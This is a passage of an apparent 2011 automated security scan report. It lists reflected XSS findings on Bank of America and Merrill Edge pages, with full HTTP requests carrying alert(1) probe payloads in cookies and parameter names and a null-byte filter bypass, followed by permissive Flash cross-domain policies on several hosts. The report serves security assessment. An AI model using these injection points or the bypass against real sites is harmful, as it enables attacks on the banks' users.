                   null);
       
       
//-->
...[SNIP]...

4.68. https://www.bankofamerica.com/smallbusiness/index.jsp [BOA_0020 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /smallbusiness/index.jsp

Issue detail

The value of the BOA_0020 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef664'%3balert(1)//3ee65bef365 was submitted in the BOA_0020 cookie. This input was echoed as ef664';alert(1)//3ee65bef365 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /smallbusiness/index.jsp HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1ef664'%3balert(1)//3ee65bef365; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:49:25 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000IJHc7D8tz_28OlBjsB6VB5q:12qb4k2ev; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Descript
...[SNIP]...
<!--


               cmSetProduction();
       

                                   cmCreateRegistrationTag(null,
                   'smbiz',
                   '20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1ef664';alert(1)//3ee65bef365',
                   false,
                   'MA',
                   null,
                   'homepage');
//-->
...[SNIP]...

4.69. https://www.bankofamerica.com/smallbusiness/index.jsp [state cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /smallbusiness/index.jsp

Issue detail

The value of the state cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cdd35'%3balert(1)//09d60cf68b2 was submitted in the state cookie. This input was echoed as cdd35';alert(1)//09d60cf68b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /smallbusiness/index.jsp HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MAcdd35'%3balert(1)//09d60cf68b2; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:47:56 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=00003JmdtK8U6bG18Qq0M1TCZsZ:12rfuedb5; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Descript
...[SNIP]...
<!--


               cmSetProduction();
       

                                   cmCreateRegistrationTag(null,
                   'smbiz',
                   '20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1',
                   false,
                   'MAcdd35';alert(1)//09d60cf68b2',
                   null,
                   'homepage');
//-->
...[SNIP]...

4.70. https://www.merrilledge.com/m/pages/global-oao.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /m/pages/global-oao.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007eae9"><script>alert(1)</script>d210b1fb8d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7eae9"><script>alert(1)</script>d210b1fb8d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /m/pages/global-oao.aspx?%007eae9"><script>alert(1)</script>d210b1fb8d3=1 HTTP/1.1
Host: www.merrilledge.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SMIDENTITY=...[SNIP]...; pxs=53e1d1d2ef5543dabbbb6e0d12a34f8b; pxv=C22A32BD-4241-4EE4-951A-6B07D6D8E16E

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 26 Apr 2011 12:28:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.merrilledge.com/m/pages/global-oao.aspx?%007eae9%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed210b1fb8d3=1
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 89588


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<a href="../System/SearchResults.aspx?.7eae9"><script>alert(1)</script>d210b1fb8d3=1&k=" id="ctl00_ECMSSearchTextBox1_srchAnchor1" class="btn" onclick="return objSearchWidgetLibrary.onsearchclick1('ctl00_ECMSSearchTextBox1_srcText','ctl00_ECMSSearchTextBox1_srchAnchor1')">
...[SNIP]...

5. Flash cross-domain policy
There are 20 instances of this issue:

5.1. http://109.xg4ken.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://109.xg4ken.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 109.xg4ken.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:44:04 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 21 Dec 2009 22:59:19 GMT
ETag: "518012-c6-a15bfc0"
Accept-Ranges: bytes
Content-Length: 198
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.2. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Tue, 26 Apr 2011 11:34:21 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.3. http://afreshbunch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://afreshbunch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: afreshbunch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 23 Jun 2009 16:55:37 GMT
Accept-Ranges: bytes
ETag: "659d66e23f4c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:03:11 GMT
Connection: close
Content-Length: 223

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

   <allow-access-from domain="*" />


...[SNIP]...

5.4. http://bridgefront.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bridgefront.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: bridgefront.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:24:01 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 22 Feb 2010 20:31:09 GMT
ETag: "2f20014-1d1-5033bd40"
Accept-Ranges: bytes
Content-Length: 465
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false"></allow-access-from>
<allow-access-from domain="www.bridgefront.com" secure="false"></allow-access-from>
<allow-access-from domain="www.bridgefront.com" secure="true">
...[SNIP]...

5.5. http://data.cmcore.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.cmcore.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: data.cmcore.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:26:01 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "1fccb-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=972
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.6. http://data.coremetrics.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.coremetrics.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: data.coremetrics.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:26:05 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "23c142-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=999
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.7. http://firstdata.122.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://firstdata.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: firstdata.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:46:30 GMT
Server: Omniture DC/2.0.0
xserver: www343
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

5.8. http://fls.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Tue, 26 Apr 2011 00:37:48 GMT
Expires: Thu, 21 Apr 2011 00:36:18 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 42634
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.9. http://now.eloqua.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/xml
Last-Modified: Tue, 26 May 2009 19:46:00 GMT
Accept-Ranges: bytes
ETag: "04c37983adec91:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 23:46:28 GMT
Connection: keep-alive
Content-Length: 206

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
   SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

5.10. http://pixel.quantserve.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Wed, 27 Apr 2011 01:21:18 GMT
Content-Type: text/xml
Content-Length: 207
Date: Tue, 26 Apr 2011 01:21:18 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

5.11. http://servedby.flashtalking.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://servedby.flashtalking.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: servedby.flashtalking.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:35:53 GMT
Server: Jetty(6.1.22)
Cache-Control: max-age=86400
content-type: application/xml
Age: 25694
Via: 1.0 mdw061003 (MII-APC/1.6)
Content-Length: 540
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.12. https://shots-s.snap.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   https://shots-s.snap.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: shots-s.snap.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:41:05 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
Last-Modified: Thu, 06 Aug 2009 19:44:15 GMT
ETag: "10b-4707e583681c0"
Accept-Ranges: bytes
Content-Length: 267
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-requ
...[SNIP]...

5.13. http://shots.snap.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://shots.snap.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: shots.snap.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:21:05 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
Last-Modified: Thu, 06 Aug 2009 19:44:15 GMT
ETag: "10b-4707e583681c0"
Accept-Ranges: bytes
Content-Length: 267
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-requ
...[SNIP]...

5.14. http://sofa.bankofamerica.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://sofa.bankofamerica.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sofa.bankofamerica.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:26:03 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "204760-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=995
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.15. http://tc.bankofamerica.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://tc.bankofamerica.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tc.bankofamerica.com

Response

HTTP/1.1 200 OK
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Tue, 26 Apr 2011 12:26:10 GMT
Connection: Keep-Alive
Content-Type: application/xml; charset=ISO-8859-1
Content-Length: 79
Last-Modified: Tue, 26 Apr 2011 12:26:10 GMT
Set-Cookie: NSC_CbolPgBnfsjdb=445b32097852;expires=Tue, 26-Apr-11 16:26:10 GMT;path=/;domain=bankofamerica.com

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

5.16. https://tc.bankofamerica.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   https://tc.bankofamerica.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tc.bankofamerica.com

Response

HTTP/1.1 200 OK
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Tue, 26 Apr 2011 12:45:45 GMT
Connection: Keep-Alive
Content-Type: application/xml; charset=ISO-8859-1
Content-Length: 79
Last-Modified: Tue, 26 Apr 2011 12:45:45 GMT
Set-Cookie: NSC_CbolPgBnfsjdb=445b32097852;expires=Tue, 26-Apr-11 16:45:45 GMT;path=/;domain=bankofamerica.com

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

5.17. http://www.afreshbunch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.afreshbunch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.afreshbunch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 23 Jun 2009 16:55:37 GMT
Accept-Ranges: bytes
ETag: "659d66e23f4c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 00:44:00 GMT
Connection: close
Content-Length: 223

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

   <allow-access-from domain="*" />


...[SNIP]...

5.18. http://realestatecenter.bankofamerica.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://realestatecenter.bankofamerica.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: realestatecenter.bankofamerica.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 1546
Content-Type: text/xml
Last-Modified: Wed, 13 Apr 2011 20:18:40 GMT
Accept-Ranges: bytes
ETag: "e960c3fa17facb1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMo TAIo OUR STP COM INT STA PRE"
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 12:44:49 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   
   <site-control permitted-cross-domain-policies="master-only" />
   
   <allow-access-from domain="listingimages.fnistools.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.woodsbros.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbshome.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.prudentialcal.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.edinarealty.com" secure="false" />
...[SNIP]...
<allow-access-from domain="edinaimages.fnistools.com" secure="false" />
...[SNIP]...
<allow-access-from domain="edinarealtymarketing.com" />

<allow-access-from domain="*.rtso.com" />

<allow-access-from domain="*.Longrealtyonline.com" />
<allow-access-from domain="*.Longnet.net" />
<allow-access-from domain="*.Youtube.com" />
<allow-access-from domain="*.Mytransactionnow.com" />
<allow-access-from domain="*.Longmortgage.com" />
<allow-access-from domain="*.Longtitle.com" />
<allow-access-from domain="*.Longinsurancegroup.com" />
<allow-access-from domain="*.Longrealtycares.com" />
<allow-access-from domain="*.Thesmarterwaytosell.com" />

<allow-access-from domain="*.video.reeceandnichols.com" />
<allow-access-from domain="*.today.reeceandnichols.com" />
...[SNIP]...

5.19. https://secure.opinionlab.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.opinionlab.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure.opinionlab.com

Response

HTTP/1.1 200 OK
Age: 1
Date: Tue, 26 Apr 2011 12:41:01 GMT
Connection: Keep-Alive
Via: YouBeenCached
ETag: "d09b92e3ff85c81:2b6f"
Content-Length: 97
Content-Type: text/xml
Last-Modified: Fri, 14 Mar 2008 18:19:06 GMT
Accept-Ranges: bytes

...<cross-domain-policy>
   <allow-access-from domain="*.opinionlab.com"/>
</cross-domain-policy>

5.20. http://stats.wordpress.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.wordpress.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: stats.wordpress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 01:20:51 GMT
Content-Type: text/xml
Connection: close
Accept-Ranges: bytes
ETag: "249-4c227139-3be9c0"
